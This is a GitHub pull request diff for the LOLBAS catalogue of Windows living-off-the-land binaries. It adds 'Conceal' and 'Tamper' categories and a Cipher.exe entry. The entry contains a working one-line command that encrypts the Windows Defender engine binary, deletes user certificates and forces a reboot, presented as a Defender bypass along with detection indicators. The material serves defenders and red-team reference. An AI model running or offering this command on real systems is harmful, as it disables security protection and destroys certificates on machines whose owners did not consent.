Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 2 additions & 0 deletions CategoryList.md
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@ CATEGORY LIST
ADS
AWL bypass
Compile
Conceal
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Matches changes made it LOLBAS-Project/LOLBAS-Project.github.io@d9405c1 ✔️

Copy
Credentials
Decode
Expand All @@ -11,5 +12,6 @@ Dump
Encode
Execute
Reconnaissance
Tamper
UAC bypass
Upload
25 changes: 25 additions & 0 deletions yml/OSBinaries/Cipher.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
---
Name: Cipher.exe
Description: Security Tool for the Windows Encrypting File System
Author: Alexander Sennhauser
Created: 2023-01-09
Commands:
- Command: cipher.exe /e "C:\ProgramData\Microsoft\Windows Defender\Platform\*\MsMpEng.exe" & certutil.exe -delstore -user my %username% & shutdown.exe /r /t 0
Description: Encrypt the Windows Defender binary to disable the service after a system restart.
Usecase: MSFT Defender bypass using LOLBINs
Category: Tamper
Privileges: Admin
MitreID: T1562
OperatingSystem: Windows 10 All
Full_Path:
- Path: c:\windows\system32\cipher.exe
Code_Sample:
- Code:
Detection:
- IOC: cipher.exe spawned with unusual path arguments
- IOC: certutil.exe spawned to delete user certificates
Resources:
- Link:
Acknowledgement:
- Person: Alexander Sennhauser
Handle: '@conitrade'